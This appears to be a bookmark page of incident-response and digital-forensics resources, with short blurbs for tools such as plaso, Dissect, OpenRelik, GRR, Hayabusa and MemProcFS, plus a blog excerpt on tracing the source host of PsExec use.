Incident Response

Super timeline all the things. Contribute to log2timeline/plaso development by creating an account on GitHub.

Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT...

Simple tool for Windows 11/10/8/7/Vista that displays in a table the details of all events from the event logs of Windows, including the event description

OpenRelik OpenRelik is an open-source (Apache-2.0) platform designed to streamline collaborative digital forensic investigations. It combines modular workflows for custom investigative processes, an intuitive interface for efficient workflow management, real-time collaboration features, and a centralized repository for shared artifacts. The platform is easy to extend with new workers to adapt to evolving forensic needs. Key concepts Archtecture Getting started Code

In one way or another, PsExec - a wildly popular remote administration tool in the Microsoft SysInternals Suite, peeks its head in the wild. Threat actors tend to leverage PsExec for various reasons such as executing programs on a remote host in a victim’s environment or for more nefarious reasons such as deploying ransomware. The focus of this blog is to bring attention to a relatively new method in identifying the source host in which PsExec was executed from. This is something that has caught my attention on a few IR engagements that I have worked on recently. Huge shoutout to Joseph Ziemba for first bringing this to my attention on one of our ransomware engagements we worked on together at KPMG.

UAC is a Live Response collection script for Incident Response that makes use of native binaries and tools to automate the collection of AIX, Android, ESXi, FreeBSD, Linux, macOS, NetBSD, NetScaler...

Details on hypothesis-driven threat hunting with the PEAK framework.

The Really Useful Logging and Event Repository Project

✨ A curated list of awesome threat detection and hunting resources 🕵️‍♂️

An IDE and translation engine for detection engineers and threat hunters. Be faster, write smarter, keep 100% privacy. - GitHub - UncoderIO/Uncoder_IO: An IDE and translation engine for detection e...

GRR Rapid Response: remote live forensics for incident response

Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs. - GitHub - Yamato-Security/hayabusa: Hayabusa (隼) is a sigma-based threat hunting and fast...

Speedily search and merge log messages by datetime

Contribute to LetsDefend/incident-response-playbooks development by creating an account on GitHub.

MemProcFS. Contribute to ufrisk/MemProcFS development by creating an account on GitHub.

CLI tools for forensic investigation of Windows artifacts

✨ A compilation of suggested tools/services for each component in a detection and response pipeline, along with real-world examples. The purpose is to create a reference hub for designing effective...

A curated list of awesome forensic analysis tools and resources - GitHub - cugu/awesome-forensics: A curated list of awesome forensic analysis tools and resources

Everything related to Linux Forensics

A curated list of tools for incident response. Contribute to meirwah/awesome-incident-response development by creating an account on GitHub.

During incident response, it is essential to establish a full context around the time of alert or when suspicious activity was identified…